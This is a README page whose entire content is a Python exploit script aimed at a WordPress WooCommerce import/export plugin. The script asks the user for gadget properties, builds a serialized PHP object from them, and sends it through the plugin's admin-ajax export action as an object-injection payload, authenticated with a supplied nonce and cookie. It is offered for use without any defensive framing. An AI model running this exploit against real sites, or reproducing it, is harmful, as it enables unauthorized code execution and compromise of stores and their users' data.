README.md
Rendering markdown...
# Author: Suhaib518 KSA
import argparse
import requests
import urllib.parse
def serialize(class_name, props):
serialized = f'O:{len(class_name)}:"{class_name}":{len(props)}:{{'
for key, value in props.items():
serialized += (
f's:{len(key)}:"{key}";'
f's:{len(value)}:"{value}";'
)
serialized += '}'
return serialized
def ask_properties():
props = {}
count = int(input("[?] How many properties does this class have? "))
for i in range(count):
key = input(f"[?] Name of property #{i+1}: ").strip()
value = input(f"[?] Value for '{key}': ").strip()
props[key] = value
return props
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--class-name", required=True)
parser.add_argument("-H", "--host", required=True)
parser.add_argument("--wp-nonce", required=True)
parser.add_argument("--cookie", required=True)
args = parser.parse_args()
print("\n[*] Interactive mode: please enter the gadget properties.")
props = ask_properties()
# Build serialized PHP payload
payload = serialize(args.class_name, props)
encoded_payload = urllib.parse.quote(payload, safe="")
# WordPress form fields
data = (
f"_wpnonce={args.wp_nonce}"
f"&action=iew_export_ajax_basic"
f"&export_action=export"
f"&selected_template=0"
f"&to_export=product"
f"&data_type=json"
f"&export_method=new"
f"&offset=0"
f"&form_data={encoded_payload}"
)
headers = {
"Host": args.host.replace("http://", "").replace("https://", ""),
"X-Requested-With": "XMLHttpRequest",
"Accept-Language": "en-US,en;q=0.9",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent": "Mozilla/5.0",
"Origin": args.host,
"Referer": f"{args.host}/wp-admin/admin.php?page=wt_import_export_for_woo_basic_export",
"Cookie": args.cookie,
}
url = f"{args.host}/wp-admin/admin-ajax.php"
print("\n[*] Sending request…")
r = requests.post(url, headers=headers, data=data)
print(f"[+] Status: {r.status_code}")
print(r.text)
if __name__ == "__main__":
main()